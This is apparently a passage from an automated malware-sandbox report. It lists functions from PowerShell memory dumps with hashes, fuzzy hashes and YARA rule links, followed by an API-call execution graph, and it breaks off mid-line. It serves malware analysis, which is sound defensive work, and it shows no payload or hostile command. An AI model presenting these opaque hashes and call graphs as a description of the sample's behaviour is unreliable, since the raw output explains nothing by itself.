                                                              • Instruction ID: b3a1d683b1b39a036ea4bbaae56af3af79177fbc424042e490d68c8ca792f6fe
                                                              • Opcode Fuzzy Hash: bd439fedf874c4657736ad0582669b40a686433e1ae49751d4dd1bfd6f42e8e6
                                                              • Instruction Fuzzy Hash: E031C131A1CB4C8FDB18DB5CAC066A97BE0EB99321F00426FE459D3252DA71A855CBC2
                                                              Function 00007FFD9AE1A74C Relevance: .1, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 702ee20c4af116b6e7e7bf865a8caf37733a6b91ab4e6e9710a436bf98754211
                                                              • Instruction ID: c03eda73d5a286a1655d5b11d2516f688f5fda7be84e4b488c534f12f0d32ea6
                                                              • Opcode Fuzzy Hash: 702ee20c4af116b6e7e7bf865a8caf37733a6b91ab4e6e9710a436bf98754211
                                                              • Instruction Fuzzy Hash: CE210631A0CB8C8FEB59DBAC984A7E97FF0EB56320F04416BD048C3152DA75A446CB91
                                                              Function 00007FFD9AE133B5 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 06d2ac2465ae7b617642e4c06c1169199b8a441424157cf7d8c5b868efba0901
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: CA01A73120CB0C4FDB48EF0CE051AA5B3E0FB85324F10056EE58AC3691DA32E882CB45
                                                              Function 00007FFD9AEE432D Relevance: .0, Instructions: 37COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3d9a1a55772e4106c123ea7cc91d3451ed4950f67b3204115b9ea5078b6b8fdb
                                                              • Instruction ID: d52f6f0a3b40d0200383cda9e42a3ac4d2ca0565e2731816c8622d207e30ef29
                                                              • Opcode Fuzzy Hash: 3d9a1a55772e4106c123ea7cc91d3451ed4950f67b3204115b9ea5078b6b8fdb
                                                              • Instruction Fuzzy Hash: 81F03A32B1D5458FE76DEB5CA4558A873E0EF85320B2500FAE16DC75A7CA2AEC41C741
                                                              Function 00007FFD9AEE45E0 Relevance: .0, Instructions: 35COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1959111539.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 70e27a1de31b8d193acbf9a369e1180ea1f6f69ead1b1cd3ccdcf913d2f8ab37
                                                              • Instruction ID: 8eaad0506f63ea633eb776314bcbeb6dbfd0857b0c82ddd9e95490b2c617544d
                                                              • Opcode Fuzzy Hash: 70e27a1de31b8d193acbf9a369e1180ea1f6f69ead1b1cd3ccdcf913d2f8ab37
                                                              • Instruction Fuzzy Hash: 2CF05E32B0D5458FDB69EB9CE4518A877E0EF05320B2500F6E16DC75A3CA2AAC44C740
                                                              Function 00007FFD9AE1A3C8 Relevance: .0, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 84d31c5a7f296e5d23d0dfac349e4893c7b65f65b712b3642b9acadd3fbbbb3d
                                                              • Instruction ID: 52b91b6f9e3bd2179169ce4c8c52dc07a3e1ba9b43fe0855fadae6fb6d7ba3c6
                                                              • Opcode Fuzzy Hash: 84d31c5a7f296e5d23d0dfac349e4893c7b65f65b712b3642b9acadd3fbbbb3d
                                                              • Instruction Fuzzy Hash: D7E04631810A4CCF8B49EF28C4199EA77E0FB68301B00425BA82DC3120EB309A58CBC2

                                                              Non-executed Functions

                                                              Function 00007FFD9AE18BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^6$M_^<$M_^F$M_^I$M_^J
                                                              • API String ID: 0-1500707516
                                                              • Opcode ID: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                              • Instruction ID: 474887572aaf16b42282042b324e9889f67f7e28ad1653b05354cb36a75cff11
                                                              • Opcode Fuzzy Hash: 041ac91ce1e2f866d46e9f53b52ae62d15ede3fa734e511d0ac2dfddc52e60c4
                                                              • Instruction Fuzzy Hash: 262127777084A6DFD30677ADB8149DC7380DBA427638947F3E269DB583EE18A08786D0
                                                              Function 00007FFD9AE186FA Relevance: 6.4, Strings: 5, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^$M_^
                                                              • API String ID: 0-679677686
                                                              • Opcode ID: 3997209995d09384bd33a54fa9837c75e7ff7b98a0c2e3c415e3b67a3fcd7941
                                                              • Instruction ID: 1f9b80f36c23e47d71b865643466a8d2c089840f99f9c31ea53c4edf3819a47d
                                                              • Opcode Fuzzy Hash: 3997209995d09384bd33a54fa9837c75e7ff7b98a0c2e3c415e3b67a3fcd7941
                                                              • Instruction Fuzzy Hash: 4531B4A3E0F6DA9FE76B5A798C754D53FD0BF22618B0A02F7C4D4CA093FD5928468211
                                                              Function 00007FFD9AE18955 Relevance: 5.2, Strings: 4, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.1958210433.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: M_^$M_^$M_^$M_^
                                                              • API String ID: 0-1397233021
                                                              • Opcode ID: 9220b89b293bd8a44e3b5863003a02f3ee3f7c07532a60cea16a0e03532f3eb3
                                                              • Instruction ID: 9af52371f77ea030fc241a35ab0761d002494e760925c5b62a9a4e73ea4d3e03
                                                              • Opcode Fuzzy Hash: 9220b89b293bd8a44e3b5863003a02f3ee3f7c07532a60cea16a0e03532f3eb3
                                                              • Instruction Fuzzy Hash: BE41B3A3B0F6D66FF36A566948790957FA0FF12348B4942F6C0D48B093FE1A28478252

                                                              Executed Functions

                                                              Function 00007FFD9AEE180D Relevance: .7, Instructions: 747COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1873454211.00007FFD9AEE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AEE0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9aee0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 580a6c10d04dc5575c831a415991470b048da0596a4462cf673f0e1dc6e7a053
                                                              • Instruction ID: 3e96ed2185ce52a6f6e6bc7d1920389c9d823b9099b8d0c4343d9b5b437ee4cb
                                                              • Opcode Fuzzy Hash: 580a6c10d04dc5575c831a415991470b048da0596a4462cf673f0e1dc6e7a053
                                                              • Instruction Fuzzy Hash: F2227722B0DAC94FE7AAA76C58741B47BE1EF96210B1801FBD49CC71D3DA1AAC46C341
                                                              Function 00007FFD9AE14DC2 Relevance: .2, Instructions: 221COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1872809225.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 877aa82a2893e61751cc70a42189dc275fc29feb3df956a698512786b0b42962
                                                              • Instruction ID: 11ff29d5666e773981c2149f4ecce28e82101ddc3cced759ba491017fb286f31
                                                              • Opcode Fuzzy Hash: 877aa82a2893e61751cc70a42189dc275fc29feb3df956a698512786b0b42962
                                                              • Instruction Fuzzy Hash: B771C571F096598FDB59EBACD8A55ECBBF1EF4A310F1441BED049D7292CA35A802CB40
                                                              Function 00007FFD9AE13945 Relevance: .0, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000025.00000002.1872809225.00007FFD9AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AE10000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_37_2_7ffd9ae10000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction ID: 8dbec33759c5214f60e6709e96cab1c9059fe32b895ae1a8b35e4546d697254f
                                                              • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                              • Instruction Fuzzy Hash: 5D01A77120CB0C4FDB48EF0CE051AA5B3E0FB85324F10066EE58AC3695D632E881CB41

                                                              Execution Graph

                                                              Execution Coverage:7.7%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:1209
                                                              Total number of Limit Nodes:40
                                                              execution_graph 38248 7ff629af1884 38380 7ff629b234e4 38248->38380 38251 7ff629af1926 38253 7ff629af195b 38251->38253 38444 7ff629b23f98 63 API calls 2 library calls 38251->38444 38252 7ff629b234e4 CompareStringW 38254 7ff629af18a6 38252->38254 38260 7ff629af1970 38253->38260 38445 7ff629b12ed8 100 API calls 3 library calls 38253->38445 38257 7ff629b234e4 CompareStringW 38254->38257 38262 7ff629af18b9 38254->38262 38257->38262 38259 7ff629af1915 38443 7ff629b0ca40 61 API calls _CxxThrowException 38259->38443 38263 7ff629af19b8 38260->38263 38446 7ff629b349f4 48 API calls 38260->38446 38262->38251 38442 7ff629af1168 8 API calls 2 library calls 38262->38442 38384 7ff629af5450 38263->38384 38265 7ff629af19b0 38447 7ff629b08444 54 API calls fflush 38265->38447 38271 7ff629af72c4 76 API calls 38278 7ff629af1a12 38271->38278 38272 7ff629af1b04 38422 7ff629b06c94 38272->38422 38273 7ff629af1ae6 38418 7ff629af7514 38273->38418 38276 7ff629af1af2 38277 7ff629af7514 72 API calls 38276->38277 38279 7ff629af1aff 38277->38279 38278->38272 38278->38273 38281 7ff629b4a610 _handle_error 8 API calls 38279->38281 38280 7ff629af1b13 38438 7ff629af7148 38280->38438 38282 7ff629af2f97 38281->38282 38284 7ff629af1c71 38285 7ff629af1ca7 38284->38285 38286 7ff629af63e8 8 API calls 38284->38286 38287 7ff629af1ce4 38285->38287 38288 7ff629af1cd5 38285->38288 38289 7ff629af1c91 38286->38289 38290 7ff629b4a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38287->38290 38292 7ff629b4a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38288->38292 38291 7ff629af49b8 99 API calls 38289->38291 38296 7ff629af1cee 38290->38296 38293 7ff629af1c9d 38291->38293 38292->38296 38294 7ff629af63e8 8 API calls 38293->38294 38294->38285 38295 7ff629af1d50 38298 7ff629b4a444 new RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38295->38298 38296->38295 38297 7ff629b3de30 72 API calls 38296->38297 38297->38295 38299 7ff629af1d62 38298->38299 38300 7ff629b3dbd0 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38299->38300 38301 7ff629af1d7b 38299->38301 38300->38301 38302 7ff629b42bcc 66 API calls 38301->38302 38303 7ff629af1dba 38302->38303 38377 7ff629b1ae10 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38303->38377 38304 7ff629af1e1c 38306 7ff629af10c0 8 API calls 38304->38306 38308 7ff629af1e5d 38304->38308 38305 7ff629af1dde std::bad_alloc::bad_alloc 38305->38304 38307 7ff629b4ba34 _CxxThrowException RtlPcToFileHeader RaiseException 38305->38307 38306->38308 38307->38304 38309 7ff629afa410 159 API calls 38308->38309 38339 7ff629af1ef4 38308->38339 38309->38339 38310 7ff629af2ccc 38311 7ff629af2d0c 38310->38311 38375 7ff629b18c80 72 API calls 38310->38375 38312 7ff629b3de30 72 API calls 38311->38312 38320 7ff629af2d21 38311->38320 38312->38320 38313 7ff629b16688 48 API calls 38313->38339 38314 7ff629af2d86 38318 7ff629b349f4 48 API calls 38314->38318 38340 7ff629af2dd0 38314->38340 38315 7ff629b3b6d0 73 API calls 38353 7ff629af2005 38315->38353 38316 7ff629af5e70 169 API calls 38316->38353 38317 7ff629afa504 208 API calls 38317->38340 38322 7ff629af2d9e 38318->38322 38319 7ff629af80e4 192 API calls 38319->38340 38320->38314 38323 7ff629b349f4 48 API calls 38320->38323 38321 7ff629afe6c8 157 API calls 38321->38339 38325 7ff629b08444 54 API calls 38322->38325 38327 7ff629af2d6c 38323->38327 38324 7ff629af5928 237 API calls 38324->38353 38328 7ff629af2da6 38325->38328 38326 7ff629b17c7c 127 API calls 38326->38340 38329 7ff629b349f4 48 API calls 38327->38329 38336 7ff629b11c24 12 API calls 38328->38336 38333 7ff629af2d79 38329->38333 38330 7ff629b0e21c 63 API calls 38330->38353 38331 7ff629af1168 8 API calls 38331->38340 38332 7ff629afb540 147 API calls 38332->38339 38334 7ff629b08444 54 API calls 38333->38334 38334->38314 38335 7ff629b165b4 48 API calls 38335->38339 38336->38340 38337 7ff629afa4d0 12 API calls 38337->38339 38338 7ff629b14554 16 API calls 38338->38339 38339->38310 38339->38313 38339->38321 38339->38332 38339->38335 38339->38337 38339->38338 38342 7ff629b11998 138 API calls 38339->38342 38345 7ff629af5db4 46 API calls 38339->38345 38348 7ff629b11e80 15 API calls 38339->38348 38350 7ff629b17c7c 127 API calls 38339->38350 38351 7ff629b11930 11 API calls 38339->38351 38339->38353 38356 7ff629af5004 49 API calls 38339->38356 38358 7ff629af571c 12 API calls 38339->38358 38359 7ff629b118ac 15 API calls 38339->38359 38360 7ff629af1168 8 API calls 38339->38360 38361 7ff629b3d48c 58 API calls 38339->38361 38362 7ff629afa410 159 API calls 38339->38362 38363 7ff629af5e70 169 API calls 38339->38363 38364 7ff629b09be0 14 API calls 38339->38364 38365 7ff629b3c0a8 10 API calls 38339->38365 38366 7ff629b16378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 38339->38366 38367 7ff629b297f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 38339->38367 38368 7ff629b0cbd0 75 API calls 38339->38368 38369 7ff629b15c0c 237 API calls 38339->38369 38370 7ff629b15d40 237 API calls 38339->38370 38371 7ff629af6114 216 API calls 38339->38371 38373 7ff629b15708 237 API calls 38339->38373 38376 7ff629b1a250 237 API calls 38339->38376 38378 7ff629b00d60 237 API calls 38339->38378 38379 7ff629b1aae0 237 API calls 38339->38379 38340->38317 38340->38319 38340->38326 38340->38331 38343 7ff629af33b4 64 API calls 38340->38343 38344 7ff629af2e39 38340->38344 38347 7ff629af6188 231 API calls 38340->38347 38352 7ff629af3f74 138 API calls 38340->38352 38354 7ff629b2ba9c 195 API calls 38340->38354 38355 7ff629b349f4 48 API calls 38340->38355 38357 7ff629b08444 54 API calls 38340->38357 38341 7ff629b3ae50 71 API calls 38341->38344 38342->38339 38343->38340 38344->38340 38344->38341 38346 7ff629b0ca40 61 API calls 38344->38346 38345->38339 38346->38340 38347->38340 38348->38339 38349 7ff629afb540 147 API calls 38349->38353 38350->38339 38351->38339 38352->38340 38353->38315 38353->38316 38353->38324 38353->38330 38353->38339 38353->38349 38372 7ff629b349f4 48 API calls 38353->38372 38374 7ff629b08444 54 API calls 38353->38374 38354->38340 38355->38340 38356->38339 38357->38340 38358->38339 38359->38339 38360->38339 38361->38339 38362->38339 38363->38339 38364->38339 38365->38339 38366->38339 38367->38339 38368->38339 38369->38339 38370->38339 38371->38339 38372->38353 38373->38339 38374->38353 38375->38311 38376->38339 38377->38305 38378->38353 38379->38353 38381 7ff629b234f6 38380->38381 38383 7ff629af1893 38381->38383 38448 7ff629b3dac0 CompareStringW 38381->38448 38383->38252 38383->38262 38387 7ff629af546f setbuf 38384->38387 38385 7ff629af554a memcpy_s 38468 7ff629b3c0a8 GetSystemTime SystemTimeToFileTime 38385->38468 38387->38385 38402 7ff629af5588 memcpy_s 38387->38402 38388 7ff629af5583 38457 7ff629af6eb8 38388->38457 38394 7ff629af56e9 38464 7ff629b36f68 38394->38464 38396 7ff629af56f6 38397 7ff629b4a610 _handle_error 8 API calls 38396->38397 38398 7ff629af19df 38397->38398 38404 7ff629af72c4 38398->38404 38402->38388 38449 7ff629b37a24 38402->38449 38472 7ff629af3210 26 API calls 38402->38472 38473 7ff629b07088 10 API calls 38402->38473 38474 7ff629af571c 38402->38474 38482 7ff629b04380 14 API calls 38402->38482 38483 7ff629af681c 54 API calls 2 library calls 38402->38483 38405 7ff629af72eb 38404->38405 38604 7ff629b088dc 38405->38604 38407 7ff629af7302 38608 7ff629b2915c 38407->38608 38409 7ff629af730f 38620 7ff629b27044 38409->38620 38412 7ff629af73f5 memcpy_s 38625 7ff629b09be0 38412->38625 38413 7ff629b4a444 new 4 API calls 38414 7ff629af73e3 38413->38414 38414->38412 38636 7ff629b1894c 38414->38636 38419 7ff629af7539 38418->38419 38729 7ff629b2922c 38419->38729 38423 7ff629b06d45 38422->38423 38424 7ff629b06cbc 38422->38424 38425 7ff629b06d83 38423->38425 38427 7ff629b06d69 38423->38427 38745 7ff629b29f78 8 API calls 2 library calls 38423->38745 38426 7ff629b06cd9 38424->38426 38740 7ff629b29f78 8 API calls 2 library calls 38424->38740 38425->38280 38432 7ff629b06cf3 38426->38432 38741 7ff629b29f78 8 API calls 2 library calls 38426->38741 38427->38425 38746 7ff629b29f78 8 API calls 2 library calls 38427->38746 38431 7ff629b06d0d 38435 7ff629b06d2b 38431->38435 38743 7ff629b29f78 8 API calls 2 library calls 38431->38743 38432->38431 38742 7ff629b29f78 8 API calls 2 library calls 38432->38742 38435->38425 38744 7ff629b29f78 8 API calls 2 library calls 38435->38744 38439 7ff629af7162 38438->38439 38440 7ff629af7167 38438->38440 38747 7ff629af6c64 130 API calls _handle_error 38439->38747 38442->38259 38443->38251 38444->38253 38445->38260 38446->38265 38447->38263 38448->38383 38451 7ff629b37a59 38449->38451 38455 7ff629b37a4f 38449->38455 38450 7ff629b37a7c 38516 7ff629b3b6d0 73 API calls _Init_thread_footer 38450->38516 38451->38450 38454 7ff629b37b1c 60 API calls 38451->38454 38451->38455 38484 7ff629b371fc 38451->38484 38517 7ff629b041b0 14 API calls 2 library calls 38451->38517 38454->38451 38455->38402 38458 7ff629af6ee6 38457->38458 38463 7ff629af6f5c 38457->38463 38593 7ff629b39f64 8 API calls memcpy_s 38458->38593 38460 7ff629af6efb 38462 7ff629af6f2f 38460->38462 38460->38463 38462->38460 38594 7ff629af7188 12 API calls 38462->38594 38463->38394 38465 7ff629b36fb4 38464->38465 38467 7ff629b36f8a 38464->38467 38466 7ff629b14538 FindClose 38466->38467 38467->38465 38467->38466 38469 7ff629b4a610 _handle_error 8 API calls 38468->38469 38470 7ff629af5576 38469->38470 38471 7ff629af681c 54 API calls 2 library calls 38470->38471 38471->38388 38472->38402 38473->38402 38475 7ff629af5742 38474->38475 38480 7ff629af575d 38474->38480 38475->38480 38599 7ff629b23520 12 API calls 2 library calls 38475->38599 38479 7ff629af57fc 38479->38402 38595 7ff629b23610 38480->38595 38482->38402 38483->38402 38490 7ff629b37217 setbuf 38484->38490 38485 7ff629b373c5 38518 7ff629b145cc 38485->38518 38490->38485 38502 7ff629b3725a 38490->38502 38503 7ff629b3729c 38490->38503 38525 7ff629b14554 38490->38525 38491 7ff629b37453 38494 7ff629b37476 38491->38494 38495 7ff629b37464 38491->38495 38493 7ff629b376ef 38493->38502 38542 7ff629b18558 10 API calls 2 library calls 38493->38542 38496 7ff629b37496 38494->38496 38522 7ff629b14538 38494->38522 38539 7ff629b37c38 55 API calls 3 library calls 38495->38539 38496->38502 38508 7ff629b14554 16 API calls 38496->38508 38498 7ff629b37471 38498->38494 38501 7ff629b37342 38501->38493 38501->38502 38514 7ff629b37656 38501->38514 38540 7ff629b04380 14 API calls 38501->38540 38543 7ff629b4a610 38502->38543 38505 7ff629b373bb 38503->38505 38507 7ff629b3732e 38503->38507 38533 7ff629b4a444 38505->38533 38507->38501 38510 7ff629b3734a 38507->38510 38508->38502 38509 7ff629b3737e 38509->38502 38532 7ff629b0cbd0 75 API calls 38509->38532 38510->38502 38510->38509 38531 7ff629b04380 14 API calls 38510->38531 38513 7ff629b37723 38541 7ff629afc214 8 API calls 2 library calls 38513->38541 38514->38493 38514->38502 38514->38513 38517->38451 38520 7ff629b145ed 38518->38520 38519 7ff629b146ec 15 API calls 38519->38520 38520->38519 38521 7ff629b146b2 38520->38521 38521->38491 38521->38501 38523 7ff629b14549 FindClose 38522->38523 38524 7ff629b1454f 38522->38524 38523->38524 38524->38496 38526 7ff629b14570 38525->38526 38530 7ff629b14574 38526->38530 38552 7ff629b146ec 38526->38552 38529 7ff629b1458d FindClose 38529->38530 38530->38503 38531->38509 38532->38502 38535 7ff629b4a44f 38533->38535 38534 7ff629b4a47a 38534->38485 38535->38534 38580 7ff629b536c0 38535->38580 38583 7ff629b4b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38535->38583 38584 7ff629b4b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38535->38584 38539->38498 38540->38514 38541->38502 38542->38502 38544 7ff629b4a61a 38543->38544 38545 7ff629b3776f 38544->38545 38546 7ff629b4a6a0 IsProcessorFeaturePresent 38544->38546 38545->38451 38547 7ff629b4a6b7 38546->38547 38591 7ff629b4a894 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 38547->38591 38549 7ff629b4a6ca 38592 7ff629b4a66c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 38549->38592 38553 7ff629b14705 setbuf 38552->38553 38554 7ff629b14733 FindFirstFileW 38553->38554 38555 7ff629b147a4 FindNextFileW 38553->38555 38557 7ff629b14749 38554->38557 38564 7ff629b1478b 38554->38564 38556 7ff629b147ae GetLastError 38555->38556 38555->38564 38556->38564 38565 7ff629b24534 38557->38565 38559 7ff629b4a610 _handle_error 8 API calls 38563 7ff629b14587 38559->38563 38561 7ff629b1477a GetLastError 38561->38564 38562 7ff629b1475f FindFirstFileW 38562->38561 38562->38564 38563->38529 38563->38530 38564->38559 38566 7ff629b24549 setbuf 38565->38566 38576 7ff629b245a2 38566->38576 38577 7ff629b2472c CharUpperW 38566->38577 38568 7ff629b4a610 _handle_error 8 API calls 38570 7ff629b1475b 38568->38570 38569 7ff629b24579 38578 7ff629b24760 CharUpperW 38569->38578 38570->38561 38570->38562 38572 7ff629b24592 38573 7ff629b24629 GetCurrentDirectoryW 38572->38573 38574 7ff629b2459a 38572->38574 38573->38576 38579 7ff629b2472c CharUpperW 38574->38579 38576->38568 38577->38569 38578->38572 38579->38576 38585 7ff629b53700 38580->38585 38590 7ff629b56938 EnterCriticalSection 38585->38590 38587 7ff629b5370d 38588 7ff629b56998 fflush LeaveCriticalSection 38587->38588 38589 7ff629b536d2 38588->38589 38589->38535 38591->38549 38593->38460 38594->38462 38597 7ff629b23626 setbuf wcschr 38595->38597 38596 7ff629b4a610 _handle_error 8 API calls 38598 7ff629af57e1 38596->38598 38597->38596 38598->38479 38600 7ff629b248bc 38598->38600 38599->38480 38601 7ff629b248cb setbuf 38600->38601 38602 7ff629b4a610 _handle_error 8 API calls 38601->38602 38603 7ff629b2493a 38602->38603 38603->38479 38605 7ff629b08919 38604->38605 38641 7ff629b34b14 38605->38641 38607 7ff629b08954 memcpy_s 38607->38407 38609 7ff629b29199 38608->38609 38646 7ff629b4a480 38609->38646 38612 7ff629b4a444 new 4 API calls 38613 7ff629b291cf 38612->38613 38614 7ff629b088dc 8 API calls 38613->38614 38615 7ff629b291e1 38613->38615 38614->38615 38616 7ff629b4a444 new 4 API calls 38615->38616 38617 7ff629b291f7 38616->38617 38618 7ff629b29209 38617->38618 38619 7ff629b088dc 8 API calls 38617->38619 38618->38409 38619->38618 38621 7ff629b088dc 8 API calls 38620->38621 38622 7ff629b27063 38621->38622 38654 7ff629b272c0 38622->38654 38658 7ff629b0901c CryptAcquireContextW 38625->38658 38629 7ff629b09c2a 38668 7ff629b39ce4 38629->38668 38633 7ff629b09c5b memcpy_s 38634 7ff629b4a610 _handle_error 8 API calls 38633->38634 38635 7ff629af1a01 38634->38635 38635->38271 38685 7ff629b37d80 38636->38685 38642 7ff629b34b26 38641->38642 38643 7ff629b34b2b 38641->38643 38645 7ff629b34b38 8 API calls _handle_error 38642->38645 38643->38607 38645->38643 38651 7ff629b4a444 38646->38651 38647 7ff629b291be 38647->38612 38648 7ff629b536c0 new 2 API calls 38648->38651 38651->38647 38651->38648 38652 7ff629b4b314 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38651->38652 38653 7ff629b4b2f4 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 38651->38653 38655 7ff629b272dd 38654->38655 38656 7ff629b4a480 4 API calls 38655->38656 38657 7ff629af7325 38655->38657 38656->38657 38657->38412 38657->38413 38659 7ff629b09057 CryptGenRandom CryptReleaseContext 38658->38659 38660 7ff629b0907e 38658->38660 38659->38660 38661 7ff629b09089 38659->38661 38662 7ff629b09c9c 11 API calls 38660->38662 38663 7ff629b09c9c 38661->38663 38662->38661 38664 7ff629b3c0a8 10 API calls 38663->38664 38665 7ff629b09cc5 38664->38665 38678 7ff629b52d74 38665->38678 38669 7ff629b09c49 38668->38669 38670 7ff629b39d15 memcpy_s 38668->38670 38672 7ff629b39b70 38669->38672 38670->38669 38681 7ff629b39d74 38670->38681 38673 7ff629b39bad memcpy_s 38672->38673 38674 7ff629b39bd9 memcpy_s 38672->38674 38673->38674 38677 7ff629b39d74 8 API calls 38673->38677 38675 7ff629b39d74 8 API calls 38674->38675 38676 7ff629b39c07 38675->38676 38676->38633 38677->38674 38679 7ff629b52d8b QueryPerformanceCounter 38678->38679 38680 7ff629b09cd7 38678->38680 38679->38680 38680->38629 38682 7ff629b39dbc 38681->38682 38682->38682 38683 7ff629b4a610 _handle_error 8 API calls 38682->38683 38684 7ff629b39f40 38683->38684 38684->38670 38692 7ff629b38094 38685->38692 38688 7ff629b18a44 38689 7ff629b18a5a memcpy_s 38688->38689 38724 7ff629b3bac4 38689->38724 38693 7ff629b3809f 38692->38693 38696 7ff629b37ec8 38693->38696 38697 7ff629b37efa memcpy_s 38696->38697 38703 7ff629b37fb5 38697->38703 38710 7ff629b3b3f0 38697->38710 38699 7ff629b3805c GetCurrentProcessId 38701 7ff629b1896e 38699->38701 38701->38688 38702 7ff629b37f7e GetProcAddressForCaller GetProcAddress 38702->38703 38703->38699 38704 7ff629b37ff1 38703->38704 38704->38701 38719 7ff629b0ca6c 48 API calls 3 library calls 38704->38719 38706 7ff629b3801f 38720 7ff629b0cda4 10 API calls 2 library calls 38706->38720 38708 7ff629b38027 38721 7ff629b0ca40 61 API calls _CxxThrowException 38708->38721 38722 7ff629b4a5a0 38710->38722 38713 7ff629b3b428 38717 7ff629b4a610 _handle_error 8 API calls 38713->38717 38714 7ff629b3b42c 38715 7ff629b248bc 8 API 